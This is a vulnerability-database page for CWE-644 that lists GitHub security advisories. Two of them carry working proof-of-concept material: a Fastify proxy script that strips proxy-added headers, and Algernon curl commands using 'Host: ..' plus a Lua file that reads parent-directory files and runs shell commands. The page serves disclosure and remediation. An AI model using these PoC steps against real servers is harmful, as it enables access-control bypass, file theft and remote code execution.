CWE-644
AllowedImproper Neutralization of HTTP Headers for Scripting Syntax
Abstraction: Variant · Status: Incomplete
The product does not neutralize or incorrectly neutralizes web scripting syntax in HTTP headers that can be used by web browser components that can process raw headers, such as Flash.
104 vulnerabilities reference this CWE, most recent first.
GHSA-GWHP-PF74-VJ37
Vulnerability from github – Published: 2026-04-16 01:02 – Updated: 2026-06-09 10:48Summary
@fastify/reply-from and @fastify/http-proxy process the client's Connection header after the proxy has added its own headers via rewriteRequestHeaders. This allows attackers to retroactively strip proxy-added headers (like access control or identification headers) from upstream requests by listing them in the Connection header value. This affects applications using these plugins with custom header injection for routing, access control, or security purposes.
Details
The vulnerability exists in @fastify/reply-from/lib/request.js at lines 128-136 (HTTP/1.1 handler) and lines 191-200 (undici handler). The processing flow is:
- Client headers are copied including the
connectionheader (@fastify/reply-from/index.jsline 91) - The proxy adds custom headers via
rewriteRequestHeaders(line 151) - During request construction, the transport handlers read the client's
Connectionheader and strip any headers listed in it - This stripping happens after
rewriteRequestHeaders, allowing clients to target proxy-added headers for removal
RFC 7230 Section 6.1 Connection header processing is intended for proxies to strip hop-by-hop headers from incoming requests before adding their own headers. The current implementation reverses this order, processing the client's Connection header after the proxy has already modified the header set.
The call chain:
1. @fastify/reply-from/index.js line 91: headers = { ...req.headers } — copies ALL client headers including connection
2. index.js line 151: requestHeaders = rewriteRequestHeaders(this.request, headers) — proxy adds custom headers (e.g., x-forwarded-by)
3. index.js line 180: requestImpl({...headers: requestHeaders...}) — passes headers to transport
4. request.js line 191 (undici): getConnectionHeaders(req.headers) — reads Connection header FROM THE CLIENT
5. request.js lines 198-200: Strips headers listed in Connection — including proxy-added headers
This is distinct from the general hop-by-hop forwarding concern — it's specifically about the client controlling which headers get stripped from the upstream request via the Connection header, subverting the proxy's rewriteRequestHeaders function.
PoC
Self-contained reproduction with an upstream echo service and a proxy that adds a custom header:
const fastify = require('fastify');
async function test() {
// Upstream service that echoes headers
const upstream = fastify({ logger: false });
upstream.get('/api/echo-headers', async (request) => {
return { headers: request.headers };
});
await upstream.listen({ port: 19801 });
// Proxy that adds a custom header via rewriteRequestHeaders
const proxy = fastify({ logger: false });
await proxy.register(require('@fastify/reply-from'), {
base: 'http://localhost:19801'
});
proxy.get('/proxy/*', async (request, reply) => {
const target = '/' + (request.params['*'] || '');
return reply.from(target, {
rewriteRequestHeaders: (originalReq, headers) => {
return { ...headers, 'x-forwarded-by': 'fastify-proxy' };
}
});
});
await proxy.listen({ port: 19800 });
// Baseline: proxy adds x-forwarded-by header
const res1 = await proxy.inject({
method: 'GET',
url: '/proxy/api/echo-headers'
});
console.log('Baseline response headers from upstream:');
const body1 = JSON.parse(res1.body);
console.log(' x-forwarded-by:', body1.headers['x-forwarded-by'] || 'NOT PRESENT');
// Attack: Connection header strips the proxy-added header
const res2 = await proxy.inject({
method: 'GET',
url: '/proxy/api/echo-headers',
headers: { 'connection': 'x-forwarded-by' }
});
console.log('\nAttack response headers from upstream:');
const body2 = JSON.parse(res2.body);
console.log(' x-forwarded-by:', body2.headers['x-forwarded-by'] || 'NOT PRESENT (stripped!)');
await proxy.close();
await upstream.close();
}
test();
Actual output:
Baseline response headers from upstream:
x-forwarded-by: fastify-proxy
Attack response headers from upstream:
x-forwarded-by: NOT PRESENT (stripped!)
The x-forwarded-by header that the proxy explicitly added in rewriteRequestHeaders is stripped before reaching the upstream.
Multiple headers can be stripped at once by sending Connection: x-forwarded-by, x-forwarded-for.
Both the undici (default) and HTTP/1.1 transport handlers in @fastify/reply-from are affected, as well as @fastify/http-proxy which delegates to @fastify/reply-from.
Impact
Attackers can selectively remove any header added by the proxy's rewriteRequestHeaders function. This enables several attack scenarios:
- Bypass proxy identification: Strip headers that identify requests as coming through the proxy, potentially bypassing upstream controls that differentiate between direct and proxied requests
- Circumvent access control: If the proxy adds headers used for routing, authorization, or security decisions (e.g.,
x-internal-auth,x-proxy-token), attackers can strip them to access unauthorized resources - Remove arbitrary headers: Any header can be targeted, including
Connection: authorizationto strip authentication orConnection: x-forwarded-for, x-forwarded-byto remove multiple headers at once
This vulnerability affects deployments where the proxy adds security-relevant headers that downstream services rely on for access control decisions. It undermines the security model where proxies act as trusted intermediaries adding authentication or routing signals.
Affected Versions
@fastify/reply-from— All versions, both undici (default) and HTTP/1.1 transport handlers@fastify/http-proxy— All versions (delegates to@fastify/reply-from)- Any configuration using
rewriteRequestHeadersto add headers that could be security-relevant - No special configuration required to exploit — works with default settings
Suggested Fix
The Connection header from the client should be processed and consumed before rewriteRequestHeaders is called, not after. Alternatively, the Connection header processing in request.js should maintain a list of headers that existed in the original client request and only strip those, not headers added by rewriteRequestHeaders.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.6.1"
},
"package": {
"ecosystem": "npm",
"name": "@fastify/reply-from"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "12.6.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 11.4.3"
},
"package": {
"ecosystem": "npm",
"name": "@fastify/http-proxy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "11.4.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33805"
],
"database_specific": {
"cwe_ids": [
"CWE-644"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-16T01:02:59Z",
"nvd_published_at": "2026-04-15T11:16:34Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\n`@fastify/reply-from` and `@fastify/http-proxy` process the client\u0027s `Connection` header after the proxy has added its own headers via `rewriteRequestHeaders`. This allows attackers to retroactively strip proxy-added headers (like access control or identification headers) from upstream requests by listing them in the `Connection` header value. This affects applications using these plugins with custom header injection for routing, access control, or security purposes.\n\n### Details\n\nThe vulnerability exists in `@fastify/reply-from/lib/request.js` at lines 128-136 (HTTP/1.1 handler) and lines 191-200 (undici handler). The processing flow is:\n\n1. Client headers are copied including the `connection` header (`@fastify/reply-from/index.js` line 91)\n2. The proxy adds custom headers via `rewriteRequestHeaders` (line 151)\n3. During request construction, the transport handlers read the client\u0027s `Connection` header and strip any headers listed in it\n4. This stripping happens after `rewriteRequestHeaders`, allowing clients to target proxy-added headers for removal\n\nRFC 7230 Section 6.1 Connection header processing is intended for proxies to strip hop-by-hop headers from incoming requests before adding their own headers. The current implementation reverses this order, processing the client\u0027s Connection header after the proxy has already modified the header set.\n\nThe call chain:\n1. `@fastify/reply-from/index.js` line 91: `headers = { ...req.headers }` \u2014 copies ALL client headers including `connection`\n2. `index.js` line 151: `requestHeaders = rewriteRequestHeaders(this.request, headers)` \u2014 proxy adds custom headers (e.g., `x-forwarded-by`)\n3. `index.js` line 180: `requestImpl({...headers: requestHeaders...})` \u2014 passes headers to transport\n4. `request.js` line 191 (undici): `getConnectionHeaders(req.headers)` \u2014 reads Connection header FROM THE CLIENT\n5. `request.js` lines 198-200: Strips headers listed in Connection \u2014 including proxy-added headers\n\nThis is distinct from the general hop-by-hop forwarding concern \u2014 it\u0027s specifically about the client controlling which headers get stripped from the upstream request via the Connection header, subverting the proxy\u0027s `rewriteRequestHeaders` function.\n\n### PoC\n\nSelf-contained reproduction with an upstream echo service and a proxy that adds a custom header:\n\n```javascript\nconst fastify = require(\u0027fastify\u0027);\n\nasync function test() {\n // Upstream service that echoes headers\n const upstream = fastify({ logger: false });\n upstream.get(\u0027/api/echo-headers\u0027, async (request) =\u003e {\n return { headers: request.headers };\n });\n await upstream.listen({ port: 19801 });\n\n // Proxy that adds a custom header via rewriteRequestHeaders\n const proxy = fastify({ logger: false });\n await proxy.register(require(\u0027@fastify/reply-from\u0027), {\n base: \u0027http://localhost:19801\u0027\n });\n\n proxy.get(\u0027/proxy/*\u0027, async (request, reply) =\u003e {\n const target = \u0027/\u0027 + (request.params[\u0027*\u0027] || \u0027\u0027);\n return reply.from(target, {\n rewriteRequestHeaders: (originalReq, headers) =\u003e {\n return { ...headers, \u0027x-forwarded-by\u0027: \u0027fastify-proxy\u0027 };\n }\n });\n });\n\n await proxy.listen({ port: 19800 });\n\n // Baseline: proxy adds x-forwarded-by header\n const res1 = await proxy.inject({\n method: \u0027GET\u0027,\n url: \u0027/proxy/api/echo-headers\u0027\n });\n console.log(\u0027Baseline response headers from upstream:\u0027);\n const body1 = JSON.parse(res1.body);\n console.log(\u0027 x-forwarded-by:\u0027, body1.headers[\u0027x-forwarded-by\u0027] || \u0027NOT PRESENT\u0027);\n\n // Attack: Connection header strips the proxy-added header\n const res2 = await proxy.inject({\n method: \u0027GET\u0027,\n url: \u0027/proxy/api/echo-headers\u0027,\n headers: { \u0027connection\u0027: \u0027x-forwarded-by\u0027 }\n });\n console.log(\u0027\\nAttack response headers from upstream:\u0027);\n const body2 = JSON.parse(res2.body);\n console.log(\u0027 x-forwarded-by:\u0027, body2.headers[\u0027x-forwarded-by\u0027] || \u0027NOT PRESENT (stripped!)\u0027);\n\n await proxy.close();\n await upstream.close();\n}\ntest();\n```\n\nActual output:\n```\nBaseline response headers from upstream:\n x-forwarded-by: fastify-proxy\n\nAttack response headers from upstream:\n x-forwarded-by: NOT PRESENT (stripped!)\n```\n\nThe `x-forwarded-by` header that the proxy explicitly added in `rewriteRequestHeaders` is stripped before reaching the upstream.\n\nMultiple headers can be stripped at once by sending `Connection: x-forwarded-by, x-forwarded-for`.\n\nBoth the undici (default) and HTTP/1.1 transport handlers in `@fastify/reply-from` are affected, as well as `@fastify/http-proxy` which delegates to `@fastify/reply-from`.\n\n### Impact\n\nAttackers can selectively remove any header added by the proxy\u0027s `rewriteRequestHeaders` function. This enables several attack scenarios:\n\n1. **Bypass proxy identification**: Strip headers that identify requests as coming through the proxy, potentially bypassing upstream controls that differentiate between direct and proxied requests\n2. **Circumvent access control**: If the proxy adds headers used for routing, authorization, or security decisions (e.g., `x-internal-auth`, `x-proxy-token`), attackers can strip them to access unauthorized resources\n3. **Remove arbitrary headers**: Any header can be targeted, including `Connection: authorization` to strip authentication or `Connection: x-forwarded-for, x-forwarded-by` to remove multiple headers at once\n\nThis vulnerability affects deployments where the proxy adds security-relevant headers that downstream services rely on for access control decisions. It undermines the security model where proxies act as trusted intermediaries adding authentication or routing signals.\n\n### Affected Versions\n\n- `@fastify/reply-from` \u2014 All versions, both undici (default) and HTTP/1.1 transport handlers\n- `@fastify/http-proxy` \u2014 All versions (delegates to `@fastify/reply-from`)\n- Any configuration using `rewriteRequestHeaders` to add headers that could be security-relevant\n- No special configuration required to exploit \u2014 works with default settings\n\n### Suggested Fix\n\nThe Connection header from the client should be processed and consumed before `rewriteRequestHeaders` is called, not after. Alternatively, the Connection header processing in `request.js` should maintain a list of headers that existed in the original client request and only strip those, not headers added by `rewriteRequestHeaders`.",
"id": "GHSA-gwhp-pf74-vj37",
"modified": "2026-06-09T10:48:00Z",
"published": "2026-04-16T01:02:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/fastify/fastify-reply-from/security/advisories/GHSA-gwhp-pf74-vj37"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33805"
},
{
"type": "WEB",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/fastify/fastify-reply-from"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:L/SI:H/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Fastify\u0027s connection header abuse enables stripping of proxy-added headers"
}
GHSA-HFVW-6R46-QM8F
Vulnerability from github – Published: 2024-10-25 09:32 – Updated: 2024-10-25 09:32Sharp and Toshiba Tec MFPs improperly process query parameters in HTTP requests, which may allow contamination of unintended data to HTTP response headers. Accessing a crafted URL which points to an affected product may cause malicious script executed on the web browser.
{
"affected": [],
"aliases": [
"CVE-2024-47549"
],
"database_specific": {
"cwe_ids": [
"CWE-116",
"CWE-644"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-25T07:15:04Z",
"severity": "HIGH"
},
"details": "Sharp and Toshiba Tec MFPs improperly process query parameters in HTTP requests, which may allow contamination of unintended data to HTTP response headers.\nAccessing a crafted URL which points to an affected product may cause malicious script executed on the web browser.",
"id": "GHSA-hfvw-6r46-qm8f",
"modified": "2024-10-25T09:32:00Z",
"published": "2024-10-25T09:32:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47549"
},
{
"type": "WEB",
"url": "https://global.sharp/products/copier/info/info_security_2024-10.html"
},
{
"type": "WEB",
"url": "https://jvn.jp/en/vu/JVNVU95063136"
},
{
"type": "WEB",
"url": "https://www.toshibatec.com/information/20241025_01.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-HG82-QQJW-CH32
Vulnerability from github – Published: 2025-07-23 12:30 – Updated: 2025-07-23 12:30IBM SmartCloud Analytics - Log Analysis 1.3.7.0, 1.3.7.1, 1.3.7.2, 1.3.8.0, 1.3.8.1, and 1.3.8.2 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.
{
"affected": [],
"aliases": [
"CVE-2024-40686"
],
"database_specific": {
"cwe_ids": [
"CWE-644"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-23T12:15:26Z",
"severity": "MODERATE"
},
"details": "IBM SmartCloud Analytics - Log Analysis 1.3.7.0, 1.3.7.1, 1.3.7.2, 1.3.8.0, 1.3.8.1, and 1.3.8.2 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.",
"id": "GHSA-hg82-qqjw-ch32",
"modified": "2025-07-23T12:30:25Z",
"published": "2025-07-23T12:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40686"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7240270"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-J59C-F72P-PC4W
Vulnerability from github – Published: 2024-12-06 18:30 – Updated: 2024-12-06 18:30The HTTP host header can be manipulated and cause the application to behave in unexpected ways. Any changes made to the header would cause the request to be sent to a completely different domain/IP address.
{
"affected": [],
"aliases": [
"CVE-2024-30129"
],
"database_specific": {
"cwe_ids": [
"CWE-644"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-06T16:15:20Z",
"severity": "MODERATE"
},
"details": "The HTTP host header can be manipulated and cause the application to behave in unexpected ways. Any changes made to the header would cause the request to be sent to a completely different domain/IP address.",
"id": "GHSA-j59c-f72p-pc4w",
"modified": "2024-12-06T18:30:45Z",
"published": "2024-12-06T18:30:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30129"
},
{
"type": "WEB",
"url": "https://support.hcl-software.com/csm?id=kb_article\u0026sysparm_article=KB0117533"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-J79Q-5FQV-HJ78
Vulnerability from github – Published: 2025-03-07 18:31 – Updated: 2025-03-07 18:31IBM Control Center 6.2.1 through 6.3.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.
{
"affected": [],
"aliases": [
"CVE-2023-35894"
],
"database_specific": {
"cwe_ids": [
"CWE-116",
"CWE-644"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-07T17:15:17Z",
"severity": "MODERATE"
},
"details": "IBM Control Center 6.2.1 through 6.3.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.",
"id": "GHSA-j79q-5fqv-hj78",
"modified": "2025-03-07T18:31:05Z",
"published": "2025-03-07T18:31:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35894"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7185101"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-JC3J-X6PG-4HMV
Vulnerability from github – Published: 2026-06-23 21:49 – Updated: 2026-06-23 21:49Summary
When algernon is started with --domain (or --letsencrypt, which silently turns on --domain at engine/flags.go:372), the request handler resolves the served directory by joining the configured --dir with the value of the client-supplied Host header. The join is performed by filepath.Join with no validation, so a Host: .. header walks one level above the document root. Subsequent file resolution then exposes everything in that parent directory — arbitrary file read, full directory listing, and, if any .lua file is present, server-side Lua execution. Algernon 1.17.7 and earlier are affected.
Details
engine/handlers.go (function RegisterHandlers, around line 510):
allRequests := func(w http.ResponseWriter, req *http.Request) {
...
servedir := servedir
if addDomain {
servedir = filepath.Join(servedir, utils.GetDomain(req)) // <— line 531
}
...
filename := utils.URL2filename(servedir, urlpath)
utils/web.go (GetDomain):
func GetDomain(req *http.Request) string {
host, _, err := net.SplitHostPort(req.Host)
if err != nil {
return req.Host // <— Host header returned verbatim
}
return host
}
utils/files.go (URL2filename) only sanitises the URL path — it never inspects dirname:
func URL2filename(dirname, urlpath string) string {
if strings.Contains(urlpath, "..") {
return dirname + Pathsep // dirname is trusted here
}
...
}
engine/flags.go (auto-enable in CertMagic / Let's Encrypt mode):
if ac.useCertMagic {
...
ac.serverAddDomain = true // <— line 372
}
Putting it together:
- The client sends
Host: ... Go's HTTP server accepts the value because.is in the URI host whitelist and there are no other characters to validate;req.Hostis... GetDomainreturns..(no port,net.SplitHostPortfails — fallback path).filepath.Join("/srv/algernon", "..")cleans to/srv.URL2filename("/srv", "/SECRET.txt")returns/srv/SECRET.txt, which the handler opens withFilePage.- For directory targets,
DirPagelists the parent — sending/afterHost: ..produces an HTML index of the parent of the docroot. - If a file with a recognised algernon extension (
.lua,.tl,.po2,.amber,.frm,.md, ...) is in the parent, the matching renderer runs server-side..luatriggers full Lua execution, includingrun3(...)which callsexec.Command("sh", "-c", command)(seelua/run3/run3.go:23).
Multi-level traversal is blocked at the protocol layer because the Go HTTP parser rejects / in the Host: value, but a single .. is enough to step outside the operator's intended docroot — and many operators put scripts, configs, certificates, log files, or sibling sites in parent(serverDir). --letsencrypt is the supported way to run algernon as a multi-domain HTTPS server, and it implicitly turns this on without the operator noticing.
This bug is distinct from the previously-fixed handler.lua parent-walk (GHSA-xwcr-wm99-g9jc) — that one used the handler.lua discovery loop and walked above rootdir; this one stays inside the normal FilePage path and rewrites rootdir itself through filepath.Join(servedir, req.Host). It is also distinct from the upload savein() issue (GHSA-2j2c-pv62-mmcp).
PoC
Build the affected version:
git clone https://github.com/xyproto/algernon
cd algernon
go build -o /tmp/algernon .
Reproduce manually:
WORK=$(mktemp -d)
mkdir -p $WORK/site
echo '<h1>public</h1>' > $WORK/site/index.html
echo 'TOP-SECRET FROM PARENT DIR' > $WORK/SECRET.txt
cat > $WORK/pwn.lua <<'LUA'
print("=== RCE ===")
local out, err, code = run3("id; uname -a")
for _,v in ipairs(out) do print(" "..v) end
LUA
/tmp/algernon --httponly --dir $WORK/site --addr :7799 --server -n --domain --nolimit &
sleep 1
# 1. Arbitrary file read
curl -H 'Host: ..' http://127.0.0.1:7799/SECRET.txt
# -> TOP-SECRET FROM PARENT DIR
# 2. Parent directory listing
curl -H 'Host: ..' http://127.0.0.1:7799/ | grep -oP 'href="[^"]+"' | head
# -> href="/SECRET.txt", href="/pwn.lua", href="/site/", ...
# 3. Server-side Lua execution (RCE)
curl -H 'Host: ..' http://127.0.0.1:7799/pwn.lua
# -> === RCE ===
# uid=0(root) gid=0(root) groups=0(root)
# Linux ...
Recorded output from a real run:
[2] arbitrary file read via Host: ..
TOP-SECRET FROM PARENT DIR
[3] directory listing of parent via Host: ..
bytes=1278, links=1
sample:
href="/alg.log"
href="/site/"
href="/SECRET.txt"
[4] Lua RCE via Host: .. when .lua exists in parent
=== RCE ===
uid=0(root) gid=0(root) groups=0(root)
Linux fg0x0 6.6.87.2-microsoft-standard-WSL2 ... x86_64 GNU/Linux
EXIT=0
Steps 2 and 3 reproduce with default flags (--domain alone, or --letsencrypt in production). Step 4 additionally requires a .lua file in the parent — common when an operator keeps shared scripts alongside the served directory, or when this bug is chained with any prior write primitive.
Impact
- An unauthenticated remote attacker who can send a single HTTP request with a
Host: ..header can read arbitrary files inparent(--dir)and enumerate that directory. - When
--letsencryptis used (the recommended way to obtain HTTPS),--domainis enabled silently, so any production multi-tenant deployment is exposed without the operator opting in. - The chained Lua-RCE path executes shell commands as the algernon process user. In the canonical
--prodinvocation documented inengine/config.go:208(serverDirOrFilename = "/srv/algernon"), the parent is/srv; in multi-domain setups the parent often holds sibling site directories and shared.lualibraries.
Suggested fix
Reject Host header values that contain .., /, \, or that resolve outside the configured serverDirOrFilename. The simplest patch:
// engine/handlers.go, where addDomain is consumed
if addDomain {
domain := utils.GetDomain(req)
if domain == "" || strings.ContainsAny(domain, "/\\") || strings.Contains(domain, "..") {
w.WriteHeader(http.StatusBadRequest)
return
}
servedir = filepath.Join(servedir, domain)
}
A stronger fix when CertMagic is active is to constrain the lookup to the certMagicDomains allow-list that flags.go already builds.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.17.7"
},
"package": {
"ecosystem": "Go",
"name": "github.com/xyproto/algernon"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.17.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48126"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-23",
"CWE-644"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-23T21:49:11Z",
"nvd_published_at": "2026-05-26T17:16:53Z",
"severity": "HIGH"
},
"details": "### Summary\n\nWhen algernon is started with `--domain` (or `--letsencrypt`, which silently turns on `--domain` at `engine/flags.go:372`), the request handler resolves the served directory by joining the configured `--dir` with the value of the client-supplied `Host` header. The join is performed by `filepath.Join` with no validation, so a `Host: ..` header walks one level above the document root. Subsequent file resolution then exposes everything in that parent directory \u2014 arbitrary file read, full directory listing, and, if any `.lua` file is present, server-side Lua execution. Algernon 1.17.7 and earlier are affected.\n\n### Details\n\n`engine/handlers.go` (function `RegisterHandlers`, around line 510):\n\n```go\nallRequests := func(w http.ResponseWriter, req *http.Request) {\n ...\n servedir := servedir\n if addDomain {\n servedir = filepath.Join(servedir, utils.GetDomain(req)) // \u003c\u2014 line 531\n }\n ...\n filename := utils.URL2filename(servedir, urlpath)\n```\n\n`utils/web.go` (`GetDomain`):\n\n```go\nfunc GetDomain(req *http.Request) string {\n host, _, err := net.SplitHostPort(req.Host)\n if err != nil {\n return req.Host // \u003c\u2014 Host header returned verbatim\n }\n return host\n}\n```\n\n`utils/files.go` (`URL2filename`) only sanitises the URL path \u2014 it never inspects `dirname`:\n\n```go\nfunc URL2filename(dirname, urlpath string) string {\n if strings.Contains(urlpath, \"..\") {\n return dirname + Pathsep // dirname is trusted here\n }\n ...\n}\n```\n\n`engine/flags.go` (auto-enable in CertMagic / Let\u0027s Encrypt mode):\n\n```go\nif ac.useCertMagic {\n ...\n ac.serverAddDomain = true // \u003c\u2014 line 372\n}\n```\n\nPutting it together:\n\n1. The client sends `Host: ..`. Go\u0027s HTTP server accepts the value because `.` is in the URI host whitelist and there are no other characters to validate; `req.Host` is `..`.\n2. `GetDomain` returns `..` (no port, `net.SplitHostPort` fails \u2014 fallback path).\n3. `filepath.Join(\"/srv/algernon\", \"..\")` cleans to `/srv`.\n4. `URL2filename(\"/srv\", \"/SECRET.txt\")` returns `/srv/SECRET.txt`, which the handler opens with `FilePage`.\n5. For directory targets, `DirPage` lists the parent \u2014 sending `/` after `Host: ..` produces an HTML index of the parent of the docroot.\n6. If a file with a recognised algernon extension (`.lua`, `.tl`, `.po2`, `.amber`, `.frm`, `.md`, ...) is in the parent, the matching renderer runs server-side. `.lua` triggers full Lua execution, including `run3(...)` which calls `exec.Command(\"sh\", \"-c\", command)` (see `lua/run3/run3.go:23`).\n\nMulti-level traversal is blocked at the protocol layer because the Go HTTP parser rejects `/` in the `Host:` value, but a single `..` is enough to step outside the operator\u0027s intended docroot \u2014 and many operators put scripts, configs, certificates, log files, or sibling sites in `parent(serverDir)`. `--letsencrypt` is the supported way to run algernon as a multi-domain HTTPS server, and it implicitly turns this on without the operator noticing.\n\nThis bug is distinct from the previously-fixed `handler.lua` parent-walk (GHSA-xwcr-wm99-g9jc) \u2014 that one used the *handler.lua discovery loop* and walked above `rootdir`; this one stays inside the normal `FilePage` path and rewrites `rootdir` itself through `filepath.Join(servedir, req.Host)`. It is also distinct from the upload `savein()` issue (GHSA-2j2c-pv62-mmcp).\n\n### PoC\n\nBuild the affected version:\n\n```\ngit clone https://github.com/xyproto/algernon\ncd algernon\ngo build -o /tmp/algernon .\n```\n\nReproduce manually:\n\n```\nWORK=$(mktemp -d)\nmkdir -p $WORK/site\necho \u0027\u003ch1\u003epublic\u003c/h1\u003e\u0027 \u003e $WORK/site/index.html\necho \u0027TOP-SECRET FROM PARENT DIR\u0027 \u003e $WORK/SECRET.txt\ncat \u003e $WORK/pwn.lua \u003c\u003c\u0027LUA\u0027\nprint(\"=== RCE ===\")\nlocal out, err, code = run3(\"id; uname -a\")\nfor _,v in ipairs(out) do print(\" \"..v) end\nLUA\n\n/tmp/algernon --httponly --dir $WORK/site --addr :7799 --server -n --domain --nolimit \u0026\nsleep 1\n\n# 1. Arbitrary file read\ncurl -H \u0027Host: ..\u0027 http://127.0.0.1:7799/SECRET.txt\n# -\u003e TOP-SECRET FROM PARENT DIR\n\n# 2. Parent directory listing\ncurl -H \u0027Host: ..\u0027 http://127.0.0.1:7799/ | grep -oP \u0027href=\"[^\"]+\"\u0027 | head\n# -\u003e href=\"/SECRET.txt\", href=\"/pwn.lua\", href=\"/site/\", ...\n\n# 3. Server-side Lua execution (RCE)\ncurl -H \u0027Host: ..\u0027 http://127.0.0.1:7799/pwn.lua\n# -\u003e === RCE ===\n# uid=0(root) gid=0(root) groups=0(root)\n# Linux ...\n```\n\nRecorded output from a real run:\n\n```\n[2] arbitrary file read via Host: ..\n TOP-SECRET FROM PARENT DIR\n\n[3] directory listing of parent via Host: ..\n bytes=1278, links=1\n sample:\n href=\"/alg.log\"\n href=\"/site/\"\n href=\"/SECRET.txt\"\n\n[4] Lua RCE via Host: .. when .lua exists in parent\n === RCE ===\n uid=0(root) gid=0(root) groups=0(root)\n Linux fg0x0 6.6.87.2-microsoft-standard-WSL2 ... x86_64 GNU/Linux\n EXIT=0\n```\n\nSteps 2 and 3 reproduce with default flags (`--domain` alone, or `--letsencrypt` in production). Step 4 additionally requires a `.lua` file in the parent \u2014 common when an operator keeps shared scripts alongside the served directory, or when this bug is chained with any prior write primitive.\n\n### Impact\n\n- An unauthenticated remote attacker who can send a single HTTP request with a `Host: ..` header can read arbitrary files in `parent(--dir)` and enumerate that directory.\n- When `--letsencrypt` is used (the recommended way to obtain HTTPS), `--domain` is enabled silently, so any production multi-tenant deployment is exposed without the operator opting in.\n- The chained Lua-RCE path executes shell commands as the algernon process user. In the canonical `--prod` invocation documented in `engine/config.go:208` (`serverDirOrFilename = \"/srv/algernon\"`), the parent is `/srv`; in multi-domain setups the parent often holds sibling site directories and shared `.lua` libraries.\n\n### Suggested fix\n\nReject Host header values that contain `..`, `/`, `\\`, or that resolve outside the configured `serverDirOrFilename`. The simplest patch:\n\n```go\n// engine/handlers.go, where addDomain is consumed\nif addDomain {\n domain := utils.GetDomain(req)\n if domain == \"\" || strings.ContainsAny(domain, \"/\\\\\") || strings.Contains(domain, \"..\") {\n w.WriteHeader(http.StatusBadRequest)\n return\n }\n servedir = filepath.Join(servedir, domain)\n}\n```\n\nA stronger fix when CertMagic is active is to constrain the lookup to the `certMagicDomains` allow-list that `flags.go` already builds.",
"id": "GHSA-jc3j-x6pg-4hmv",
"modified": "2026-06-23T21:49:11Z",
"published": "2026-06-23T21:49:11Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xyproto/algernon/security/advisories/GHSA-jc3j-x6pg-4hmv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48126"
},
{
"type": "PACKAGE",
"url": "https://github.com/xyproto/algernon"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Algernon: Host header path traversal in --domain mode reads files and runs Lua from parent dir"
}
GHSA-M2JH-FXW4-GPHM
Vulnerability from github – Published: 2021-10-05 20:23 – Updated: 2021-10-05 18:47Meta
- CVSS:
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:F/RL:O/RC:C(3.5)
Problem
